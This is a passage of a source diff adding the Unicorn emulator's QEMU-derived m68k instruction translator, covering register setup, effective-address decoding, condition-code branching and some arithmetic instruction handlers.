tcg_gen_qemu_st64 + +#define DREG(insn, pos) *((TCGv *)tcg_ctx->cpu_dregs[((insn) >> (pos)) & 7]) +#define AREG(insn, pos) *((TCGv *)tcg_ctx->cpu_aregs[((insn) >> (pos)) & 7]) +#define FREG(insn, pos) tcg_ctx->cpu_fregs[((insn) >> (pos)) & 7] +#define MACREG(acc) tcg_ctx->cpu_macc[acc] +#define QREG_SP *((TCGv *)tcg_ctx->cpu_aregs[7]) + +#define IS_NULL_QREG(t) (TCGV_EQUAL(t, tcg_ctx->NULL_QREG)) + +void m68k_tcg_init(struct uc_struct *uc) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + char *p; + int i; + +#define DEFO32(name, offset) if (!uc->init_tcg) { tcg_ctx->QREG_##name = g_malloc0(sizeof(TCGv));} *((TCGv *)tcg_ctx->QREG_##name) = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, offsetof(CPUM68KState, offset), #name); +#define DEFO64(name, offset) tcg_ctx->QREG_##name = tcg_global_mem_new_i64(tcg_ctx, TCG_AREG0, offsetof(CPUM68KState, offset), #name); +#define DEFF64(name, offset) DEFO64(name, offset) +#include "qregs.def" +#undef DEFO32 +#undef DEFO64 +#undef DEFF64 + + // tcg_ctx->QREG_FP_RESULT = tcg_global_mem_new_i64(tcg_ctx, TCG_AREG0, offsetof(CPUM68KState, fp_result), "FP_RESULT"); + + tcg_ctx->cpu_halted = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, + 0-offsetof(M68kCPU, env) + + offsetof(CPUState, halted), "HALTED"); + + tcg_ctx->cpu_env = tcg_global_reg_new_ptr(tcg_ctx, TCG_AREG0, "env"); + + p = tcg_ctx->cpu_reg_names; + + for (i = 0; i < 8; i++) { + sprintf(p, "D%d", i); + if (!uc->init_tcg) + tcg_ctx->cpu_dregs[i] = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_dregs[i]) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUM68KState, dregs[i]), p); + p += 3; + sprintf(p, "A%d", i); + if (!uc->init_tcg) + tcg_ctx->cpu_aregs[i] = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_aregs[i]) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUM68KState, aregs[i]), p); + p += 3; + sprintf(p, "F%d", i); + tcg_ctx->cpu_fregs[i] = tcg_global_mem_new_i64(tcg_ctx, TCG_AREG0, + offsetof(CPUM68KState, fregs[i]), p); + p += 3; + } + + for (i = 0; i < 4; i++) { + sprintf(p, "ACC%d", i); + tcg_ctx->cpu_macc[i] = tcg_global_mem_new_i64(tcg_ctx, TCG_AREG0, + offsetof(CPUM68KState, macc[i]), p); + p += 5; + } + + if (!uc->init_tcg) + tcg_ctx->NULL_QREG = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->NULL_QREG) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, -4, "NULL"); + + if (!uc->init_tcg) + tcg_ctx->store_dummy = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->store_dummy) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, -8, "NULL"); + + uc->init_tcg = true; +} + +/* internal defines */ +typedef struct DisasContext { + CPUM68KState *env; + target_ulong insn_pc; /* Start of the current instruction. */ + target_ulong pc; + int is_jmp; + int cc_op; + int user; + uint32_t fpcr; + struct TranslationBlock *tb; + int singlestep_enabled; + int is_mem; + TCGv_i64 mactmp; + int done_mac; + + // Unicorn engine + struct uc_struct *uc; +} DisasContext; + +#define DISAS_JUMP_NEXT 4 + +#if defined(CONFIG_USER_ONLY) +#define IS_USER(s) 1 +#else +#define IS_USER(s) s->user +#endif + +#define OS_BYTE 0 +#define OS_WORD 1 +#define OS_LONG 2 +#define OS_SINGLE 4 +#define OS_DOUBLE 5 + +typedef void (*disas_proc)(CPUM68KState *env, DisasContext *s, uint16_t insn); + +#ifdef DEBUG_DISPATCH +#define DISAS_INSN(name) \ + static void real_disas_##name(CPUM68KState *env, DisasContext *s, \ + uint16_t insn); \ + static void disas_##name(CPUM68KState *env, DisasContext *s, \ + uint16_t insn) \ + { \ + qemu_log("Dispatch " #name "\n"); \ + real_disas_##name(s, env, insn); \ + } \ + static void real_disas_##name(CPUM68KState *env, DisasContext *s, \ + uint16_t insn) +#else +#define DISAS_INSN(name) \ + static void disas_##name(CPUM68KState *env, DisasContext *s, \ + uint16_t insn) +#endif + +/* Generate a load from the specified address. Narrow values are + sign extended to full register width. */ +static inline TCGv gen_load(DisasContext * s, int opsize, TCGv addr, int sign) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + int index = IS_USER(s); + s->is_mem = 1; + tmp = tcg_temp_new_i32(tcg_ctx); + switch(opsize) { + case OS_BYTE: + if (sign) + tcg_gen_qemu_ld8s(s->uc, tmp, addr, index); + else + tcg_gen_qemu_ld8u(s->uc, tmp, addr, index); + break; + case OS_WORD: + if (sign) + tcg_gen_qemu_ld16s(s->uc, tmp, addr, index); + else + tcg_gen_qemu_ld16u(s->uc, tmp, addr, index); + break; + case OS_LONG: + case OS_SINGLE: + tcg_gen_qemu_ld32u(s->uc, tmp, addr, index); + break; + default: + g_assert_not_reached(); + } + return tmp; +} + +static inline TCGv_i64 gen_load64(DisasContext * s, TCGv addr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tmp; + int index = IS_USER(s); + s->is_mem = 1; + tmp = tcg_temp_new_i64(tcg_ctx); + tcg_gen_qemu_ldf64(s->uc, tmp, addr, index); + return tmp; +} + +/* Generate a store. */ +static inline void gen_store(DisasContext *s, int opsize, TCGv addr, TCGv val) +{ + int index = IS_USER(s); + s->is_mem = 1; + switch(opsize) { + case OS_BYTE: + tcg_gen_qemu_st8(s->uc, val, addr, index); + break; + case OS_WORD: + tcg_gen_qemu_st16(s->uc, val, addr, index); + break; + case OS_LONG: + case OS_SINGLE: + tcg_gen_qemu_st32(s->uc, val, addr, index); + break; + default: + g_assert_not_reached(); + } +} + +static inline void gen_store64(DisasContext *s, TCGv addr, TCGv_i64 val) +{ + int index = IS_USER(s); + s->is_mem = 1; + tcg_gen_qemu_stf64(s->uc, val, addr, index); +} + +typedef enum { + EA_STORE, + EA_LOADU, + EA_LOADS +} ea_what; + +/* Generate an unsigned load if VAL is 0 a signed load if val is -1, + otherwise generate a store. */ +static TCGv gen_ldst(DisasContext *s, int opsize, TCGv addr, TCGv val, + ea_what what) +{ + if (what == EA_STORE) { + TCGContext *tcg_ctx = s->uc->tcg_ctx; + gen_store(s, opsize, addr, val); + return *(TCGv *)tcg_ctx->store_dummy; + } else { + return gen_load(s, opsize, addr, what == EA_LOADS); + } +} + +/* Read a 32-bit immediate constant. */ +static inline uint32_t read_im32(CPUM68KState *env, DisasContext *s) +{ + uint32_t im; + im = ((uint32_t)cpu_lduw_code(env, s->pc)) << 16; + s->pc += 2; + im |= cpu_lduw_code(env, s->pc); + s->pc += 2; + return im; +} + +/* Calculate and address index. */ +static TCGv gen_addr_index(DisasContext *s, uint16_t ext, TCGv tmp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv add; + int scale; + + add = (ext & 0x8000) ? AREG(ext, 12) : DREG(ext, 12); + if ((ext & 0x800) == 0) { + tcg_gen_ext16s_i32(tcg_ctx, tmp, add); + add = tmp; + } + scale = (ext >> 9) & 3; + if (scale != 0) { + tcg_gen_shli_i32(tcg_ctx, tmp, add, scale); + add = tmp; + } + return add; +} + +/* Handle a base + index + displacement effective addresss. + A NULL_QREG base means pc-relative. */ +static TCGv gen_lea_indexed(CPUM68KState *env, DisasContext *s, int opsize, + TCGv base) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t offset; + uint16_t ext; + TCGv add; + TCGv tmp; + uint32_t bd, od; + + offset = s->pc; + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + + if ((ext & 0x800) == 0 && !m68k_feature(s->env, M68K_FEATURE_WORD_INDEX)) + return *(TCGv *)tcg_ctx->NULL_QREG; + + if (ext & 0x100) { + /* full extension word format */ + if (!m68k_feature(s->env, M68K_FEATURE_EXT_FULL)) + return *(TCGv *)tcg_ctx->NULL_QREG; + + if ((ext & 0x30) > 0x10) { + /* base displacement */ + if ((ext & 0x30) == 0x20) { + bd = (int16_t)cpu_lduw_code(env, s->pc); + s->pc += 2; + } else { + bd = read_im32(env, s); + } + } else { + bd = 0; + } + tmp = tcg_temp_new(tcg_ctx); + if ((ext & 0x44) == 0) { + /* pre-index */ + add = gen_addr_index(s, ext, tmp); + } else { + add = *(TCGv *)tcg_ctx->NULL_QREG; + } + if ((ext & 0x80) == 0) { + /* base not suppressed */ + if (IS_NULL_QREG(base)) { + base = tcg_const_i32(tcg_ctx, offset + bd); + bd = 0; + } + if (!IS_NULL_QREG(add)) { + tcg_gen_add_i32(tcg_ctx, tmp, add, base); + add = tmp; + } else { + add = base; + } + } + if (!IS_NULL_QREG(add)) { + if (bd != 0) { + tcg_gen_addi_i32(tcg_ctx, tmp, add, bd); + add = tmp; + } + } else { + add = tcg_const_i32(tcg_ctx, bd); + } + if ((ext & 3) != 0) { + /* memory indirect */ + base = gen_load(s, OS_LONG, add, 0); + if ((ext & 0x44) == 4) { + add = gen_addr_index(s, ext, tmp); + tcg_gen_add_i32(tcg_ctx, tmp, add, base); + add = tmp; + } else { + add = base; + } + if ((ext & 3) > 1) { + /* outer displacement */ + if ((ext & 3) == 2) { + od = (int16_t)cpu_lduw_code(env, s->pc); + s->pc += 2; + } else { + od = read_im32(env, s); + } + } else { + od = 0; + } + if (od != 0) { + tcg_gen_addi_i32(tcg_ctx, tmp, add, od); + add = tmp; + } + } + } else { + /* brief extension word format */ + tmp = tcg_temp_new(tcg_ctx); + add = gen_addr_index(s, ext, tmp); + if (!IS_NULL_QREG(base)) { + tcg_gen_add_i32(tcg_ctx, tmp, add, base); + if ((int8_t)ext) + tcg_gen_addi_i32(tcg_ctx, tmp, tmp, (int8_t)ext); + } else { + tcg_gen_addi_i32(tcg_ctx, tmp, add, offset + (int8_t)ext); + } + add = tmp; + } + return add; +} + +/* Update the CPU env CC_OP state. */ +static inline void gen_flush_cc_op(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (s->cc_op != CC_OP_DYNAMIC) + tcg_gen_movi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_OP, s->cc_op); +} + +/* Evaluate all the CC flags. */ +static inline void gen_flush_flags(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (s->cc_op == CC_OP_FLAGS) + return; + gen_flush_cc_op(s); + gen_helper_flush_flags(tcg_ctx, tcg_ctx->cpu_env, *(TCGv *)tcg_ctx->QREG_CC_OP); + s->cc_op = CC_OP_FLAGS; +} + +static void gen_logic_cc(DisasContext *s, TCGv val) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_mov_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_DEST, val); + s->cc_op = CC_OP_LOGIC; +} + +static void gen_update_cc_add(DisasContext *s, TCGv dest, TCGv src) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_mov_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_DEST, dest); + tcg_gen_mov_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_SRC, src); +} + +static inline int opsize_bytes(int opsize) +{ + switch (opsize) { + case OS_BYTE: return 1; + case OS_WORD: return 2; + case OS_LONG: return 4; + case OS_SINGLE: return 4; + case OS_DOUBLE: return 8; + default: + g_assert_not_reached(); + return 0; + } + + return 0; +} + +/* Assign value to a register. If the width is less than the register width + only the low part of the register is set. */ +static void gen_partset_reg(DisasContext *s, int opsize, TCGv reg, TCGv val) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + switch (opsize) { + case OS_BYTE: + tcg_gen_andi_i32(tcg_ctx, reg, reg, 0xffffff00); + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_ext8u_i32(tcg_ctx, tmp, val); + tcg_gen_or_i32(tcg_ctx, reg, reg, tmp); + break; + case OS_WORD: + tcg_gen_andi_i32(tcg_ctx, reg, reg, 0xffff0000); + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_ext16u_i32(tcg_ctx, tmp, val); + tcg_gen_or_i32(tcg_ctx, reg, reg, tmp); + break; + case OS_LONG: + case OS_SINGLE: + tcg_gen_mov_i32(tcg_ctx, reg, val); + break; + default: + g_assert_not_reached(); + } +} + +/* Sign or zero extend a value. */ +static inline TCGv gen_extend(DisasContext *s, TCGv val, int opsize, int sign) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + + switch (opsize) { + case OS_BYTE: + tmp = tcg_temp_new(tcg_ctx); + if (sign) + tcg_gen_ext8s_i32(tcg_ctx, tmp, val); + else + tcg_gen_ext8u_i32(tcg_ctx, tmp, val); + break; + case OS_WORD: + tmp = tcg_temp_new(tcg_ctx); + if (sign) + tcg_gen_ext16s_i32(tcg_ctx, tmp, val); + else + tcg_gen_ext16u_i32(tcg_ctx, tmp, val); + break; + case OS_LONG: + case OS_SINGLE: + tmp = val; + break; + default: + g_assert_not_reached(); + } + return tmp; +} + +/* Generate code for an "effective address". Does not adjust the base + register for autoincrement addressing modes. */ +static TCGv gen_lea(CPUM68KState *env, DisasContext *s, uint16_t insn, + int opsize) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv tmp; + uint16_t ext; + uint32_t offset; + + switch ((insn >> 3) & 7) { + case 0: /* Data register direct. */ + case 1: /* Address register direct. */ + return *(TCGv *)tcg_ctx->NULL_QREG; + case 2: /* Indirect register */ + case 3: /* Indirect postincrement. */ + return AREG(insn, 0); + case 4: /* Indirect predecrememnt. */ + reg = AREG(insn, 0); + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_subi_i32(tcg_ctx, tmp, reg, opsize_bytes(opsize)); + return tmp; + case 5: /* Indirect displacement. */ + reg = AREG(insn, 0); + tmp = tcg_temp_new(tcg_ctx); + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + tcg_gen_addi_i32(tcg_ctx, tmp, reg, (int16_t)ext); + return tmp; + case 6: /* Indirect index + displacement. */ + reg = AREG(insn, 0); + return gen_lea_indexed(env, s, opsize, reg); + case 7: /* Other */ + switch (insn & 7) { + case 0: /* Absolute short. */ + offset = cpu_ldsw_code(env, s->pc); + s->pc += 2; + return tcg_const_i32(tcg_ctx, offset); + case 1: /* Absolute long. */ + offset = read_im32(env, s); + return tcg_const_i32(tcg_ctx, offset); + case 2: /* pc displacement */ + offset = s->pc; + offset += cpu_ldsw_code(env, s->pc); + s->pc += 2; + return tcg_const_i32(tcg_ctx, offset); + case 3: /* pc index+displacement. */ + return gen_lea_indexed(env, s, opsize, *(TCGv *)tcg_ctx->NULL_QREG); + case 4: /* Immediate. */ + default: + return *(TCGv *)tcg_ctx->NULL_QREG; + } + } + /* Should never happen. */ + return *(TCGv *)tcg_ctx->NULL_QREG; +} + +/* Helper function for gen_ea. Reuse the computed address between the + for read/write operands. */ +static inline TCGv gen_ea_once(CPUM68KState *env, DisasContext *s, + uint16_t insn, int opsize, TCGv val, + TCGv *addrp, ea_what what) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + + if (addrp && what == EA_STORE) { + tmp = *addrp; + } else { + tmp = gen_lea(env, s, insn, opsize); + if (IS_NULL_QREG(tmp)) + return tmp; + if (addrp) + *addrp = tmp; + } + return gen_ldst(s, opsize, tmp, val, what); +} + +/* Generate code to load/store a value from/into an EA. If VAL > 0 this is + a write otherwise it is a read (0 == sign extend, -1 == zero extend). + ADDRP is non-null for readwrite operands. */ +static TCGv gen_ea(CPUM68KState *env, DisasContext *s, uint16_t insn, + int opsize, TCGv val, TCGv *addrp, ea_what what) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv result; + uint32_t offset; + + switch ((insn >> 3) & 7) { + case 0: /* Data register direct. */ + reg = DREG(insn, 0); + if (what == EA_STORE) { + gen_partset_reg(s, opsize, reg, val); + return *(TCGv *)tcg_ctx->store_dummy; + } else { + return gen_extend(s, reg, opsize, what == EA_LOADS); + } + case 1: /* Address register direct. */ + reg = AREG(insn, 0); + if (what == EA_STORE) { + tcg_gen_mov_i32(tcg_ctx, reg, val); + return *(TCGv *)tcg_ctx->store_dummy; + } else { + return gen_extend(s, reg, opsize, what == EA_LOADS); + } + case 2: /* Indirect register */ + reg = AREG(insn, 0); + return gen_ldst(s, opsize, reg, val, what); + case 3: /* Indirect postincrement. */ + reg = AREG(insn, 0); + result = gen_ldst(s, opsize, reg, val, what); + /* ??? This is not exception safe. The instruction may still + fault after this point. */ + if (what == EA_STORE || !addrp) + tcg_gen_addi_i32(tcg_ctx, reg, reg, opsize_bytes(opsize)); + return result; + case 4: /* Indirect predecrememnt. */ + { + TCGv tmp; + if (addrp && what == EA_STORE) { + tmp = *addrp; + } else { + tmp = gen_lea(env, s, insn, opsize); + if (IS_NULL_QREG(tmp)) + return tmp; + if (addrp) + *addrp = tmp; + } + result = gen_ldst(s, opsize, tmp, val, what); + /* ??? This is not exception safe. The instruction may still + fault after this point. */ + if (what == EA_STORE || !addrp) { + reg = AREG(insn, 0); + tcg_gen_mov_i32(tcg_ctx, reg, tmp); + } + } + return result; + case 5: /* Indirect displacement. */ + case 6: /* Indirect index + displacement. */ + return gen_ea_once(env, s, insn, opsize, val, addrp, what); + case 7: /* Other */ + switch (insn & 7) { + case 0: /* Absolute short. */ + case 1: /* Absolute long. */ + case 2: /* pc displacement */ + case 3: /* pc index+displacement. */ + return gen_ea_once(env, s, insn, opsize, val, addrp, what); + case 4: /* Immediate. */ + /* Sign extend values for consistency. */ + switch (opsize) { + case OS_BYTE: + if (what == EA_LOADS) { + offset = cpu_ldsb_code(env, s->pc + 1); + } else { + offset = cpu_ldub_code(env, s->pc + 1); + } + s->pc += 2; + break; + case OS_WORD: + if (what == EA_LOADS) { + offset = cpu_ldsw_code(env, s->pc); + } else { + offset = cpu_lduw_code(env, s->pc); + } + s->pc += 2; + break; + case OS_LONG: + offset = read_im32(env, s); + break; + default: + // Should not happen : for OS_SIGNLE + return *(TCGv *)tcg_ctx->NULL_QREG; + } + return tcg_const_i32(tcg_ctx, offset); + default: + return *(TCGv *)tcg_ctx->NULL_QREG; + } + } + /* Should never happen. */ + return *(TCGv *)tcg_ctx->NULL_QREG; +} + +/* This generates a conditional branch, clobbering all temporaries. */ +static void gen_jmpcc(DisasContext *s, int cond, int l1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + + /* TODO: Optimize compare/branch pairs rather than always flushing + flag state to CC_OP_FLAGS. */ + gen_flush_flags(s); + switch (cond) { + case 0: /* T */ + tcg_gen_br(tcg_ctx, l1); + break; + case 1: /* F */ + break; + case 2: /* HI (!C && !Z) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_C | CCF_Z); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, 0, l1); + break; + case 3: /* LS (C || Z) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_C | CCF_Z); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tmp, 0, l1); + break; + case 4: /* CC (!C) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_C); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, 0, l1); + break; + case 5: /* CS (C) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_C); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tmp, 0, l1); + break; + case 6: /* NE (!Z) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_Z); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, 0, l1); + break; + case 7: /* EQ (Z) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_Z); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tmp, 0, l1); + break; + case 8: /* VC (!V) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_V); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, 0, l1); + break; + case 9: /* VS (V) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_V); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tmp, 0, l1); + break; + case 10: /* PL (!N) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_N); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, 0, l1); + break; + case 11: /* MI (N) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_N); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tmp, 0, l1); + break; + case 12: /* GE (!(N ^ V)) */ + tmp = tcg_temp_new(tcg_ctx); + assert(CCF_V == (CCF_N >> 2)); + tcg_gen_shri_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, 2); + tcg_gen_xor_i32(tcg_ctx, tmp, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, CCF_V); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, 0, l1); + break; + case 13: /* LT (N ^ V) */ + tmp = tcg_temp_new(tcg_ctx); + assert(CCF_V == (CCF_N >> 2)); + tcg_gen_shri_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, 2); + tcg_gen_xor_i32(tcg_ctx, tmp, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, CCF_V); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tmp, 0, l1); + break; + case 14: /* GT (!(Z || (N ^ V))) */ + tmp = tcg_temp_new(tcg_ctx); + assert(CCF_V == (CCF_N >> 2)); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_N); + tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 2); + tcg_gen_xor_i32(tcg_ctx, tmp, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, CCF_V | CCF_Z); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, 0, l1); + break; + case 15: /* LE (Z || (N ^ V)) */ + tmp = tcg_temp_new(tcg_ctx); + assert(CCF_V == (CCF_N >> 2)); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_N); + tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 2); + tcg_gen_xor_i32(tcg_ctx, tmp, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, CCF_V | CCF_Z); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tmp, 0, l1); + break; + default: + /* Should ever happen. */ + abort(); + } +} + +DISAS_INSN(scc) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int l1; + int cond; + TCGv reg; + + l1 = gen_new_label(tcg_ctx); + cond = (insn >> 8) & 0xf; + reg = DREG(insn, 0); + tcg_gen_andi_i32(tcg_ctx, reg, reg, 0xffffff00); + /* This is safe because we modify the reg directly, with no other values + live. */ + gen_jmpcc(s, cond ^ 1, l1); + tcg_gen_ori_i32(tcg_ctx, reg, reg, 0xff); + gen_set_label(tcg_ctx, l1); +} + +/* Force a TB lookup after an instruction that changes the CPU state. */ +static void gen_lookup_tb(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + gen_flush_cc_op(s); + tcg_gen_movi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_PC, s->pc); + s->is_jmp = DISAS_UPDATE; +} + +/* Generate a jump to an immediate address. */ +static void gen_jmp_im(DisasContext *s, uint32_t dest) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + gen_flush_cc_op(s); + tcg_gen_movi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_PC, dest); + s->is_jmp = DISAS_JUMP; +} + +/* Generate a jump to the address in qreg DEST. */ +static void gen_jmp(DisasContext *s, TCGv dest) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + gen_flush_cc_op(s); + tcg_gen_mov_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_PC, dest); + s->is_jmp = DISAS_JUMP; +} + +static void gen_exception(DisasContext *s, uint32_t where, int nr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + gen_flush_cc_op(s); + gen_jmp_im(s, where); + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, nr)); +} + +static inline void gen_addr_fault(DisasContext *s) +{ + gen_exception(s, s->insn_pc, EXCP_ADDRESS); +} + +#define SRC_EA(env, result, opsize, op_sign, addrp) do { \ + result = gen_ea(env, s, insn, opsize, *(TCGv *)tcg_ctx->NULL_QREG, addrp, \ + op_sign ? EA_LOADS : EA_LOADU); \ + if (IS_NULL_QREG(result)) { \ + gen_addr_fault(s); \ + return; \ + } \ + } while (0) + +#define DEST_EA(env, insn, opsize, val, addrp) do { \ + TCGv ea_result = gen_ea(env, s, insn, opsize, val, addrp, EA_STORE); \ + if (IS_NULL_QREG(ea_result)) { \ + gen_addr_fault(s); \ + return; \ + } \ + } while (0) + +/* Generate a jump to an immediate address. */ +static void gen_jmp_tb(DisasContext *s, int n, uint32_t dest) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TranslationBlock *tb; + + tb = s->tb; + if (unlikely(s->singlestep_enabled)) { + gen_exception(s, dest, EXCP_DEBUG); + } else if ((tb->pc & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK) || + (s->pc & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK)) { + tcg_gen_goto_tb(tcg_ctx, n); + tcg_gen_movi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_PC, dest); + tcg_gen_exit_tb(tcg_ctx, (uintptr_t)tb + n); + } else { + gen_jmp_im(s, dest); + tcg_gen_exit_tb(tcg_ctx, 0); + } + s->is_jmp = DISAS_TB_JUMP; +} + +DISAS_INSN(undef_mac) +{ + gen_exception(s, s->pc - 2, EXCP_LINEA); +} + +DISAS_INSN(undef_fpu) +{ + gen_exception(s, s->pc - 2, EXCP_LINEF); +} + +DISAS_INSN(undef) +{ + gen_exception(s, s->pc - 2, EXCP_UNSUPPORTED); +} + +DISAS_INSN(mulw) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv tmp; + TCGv src; + int sign; + + sign = (insn & 0x100) != 0; + reg = DREG(insn, 9); + tmp = tcg_temp_new(tcg_ctx); + if (sign) + tcg_gen_ext16s_i32(tcg_ctx, tmp, reg); + else + tcg_gen_ext16u_i32(tcg_ctx, tmp, reg); + SRC_EA(env, src, OS_WORD, sign, NULL); + tcg_gen_mul_i32(tcg_ctx, tmp, tmp, src); + tcg_gen_mov_i32(tcg_ctx, reg, tmp); + /* Unlike m68k, coldfire always clears the overflow bit. */ + gen_logic_cc(s, tmp); +} + +DISAS_INSN(divw) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv tmp; + TCGv src; + int sign; + + sign = (insn & 0x100) != 0; + reg = DREG(insn, 9); + if (sign) { + tcg_gen_ext16s_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_DIV1, reg); + } else { + tcg_gen_ext16u_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_DIV1, reg); + } + SRC_EA(env, src, OS_WORD, sign, NULL); + tcg_gen_mov_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_DIV2, src); + if (sign) { + gen_helper_divs(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, 1)); + } else { + gen_helper_divu(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, 1)); + } + + tmp = tcg_temp_new(tcg_ctx); + src = tcg_temp_new(tcg_ctx); + tcg_gen_ext16u_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_DIV1); + tcg_gen_shli_i32(tcg_ctx, src, *(TCGv *)tcg_ctx->QREG_DIV2, 16); + tcg_gen_or_i32(tcg_ctx, reg, tmp, src); + s->cc_op = CC_OP_FLAGS; +} + +DISAS_INSN(divl) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + 